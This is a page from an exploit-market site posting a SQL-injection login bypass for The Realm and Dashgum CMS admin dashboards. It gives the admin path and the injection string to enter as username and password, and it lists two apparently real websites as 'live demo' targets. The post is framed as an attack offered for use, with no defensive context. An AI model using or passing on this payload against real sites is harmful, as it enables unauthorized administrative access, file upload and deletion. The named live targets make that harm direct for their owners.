[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

The Realm / Dashgum Software CMS Admin Page ByPass Vulnerability

Author
xBADGIRL21
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-25244
Category
web applications
Date add
03-10-2016
Platform
php
######################
# Exploit Title : The Realm / Dashgum Software CMS Admin Page ByPass
# Exploit Author : xBADGIRL21
# version The Realm : 1.0.1
# version Dashgum : v2
# Vendor : http://www.bluthemes.com/item/realm - http://gridgum.com/themes/dashgum-bootstrap-dashboard/
# Tested on: [ Windows ]
# skype:xbadgirl21
# Date: 2016/07/10
# video Proof : https://youtu.be/u8CDfPSbwOI
######################
# Describe :
# This Exploit Allow The Attacker to bypass the admin
# page info.
# Login to the admin Dashboard Give you Full Access to
# Upload or Delete .....etc
# PoC:
# Put [admin] After url such as :
# http://site.com/admin
# Now enter fill username or email and Password like the information below :
# Username: '=' 'OR'
# Password: '=' 'OR'
#
# Live Demo :
# http://khasbagh.com/admin/
# http://www.linikantech.com/admin/
#
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
#######################


#  0day.today [2024-12-25]  #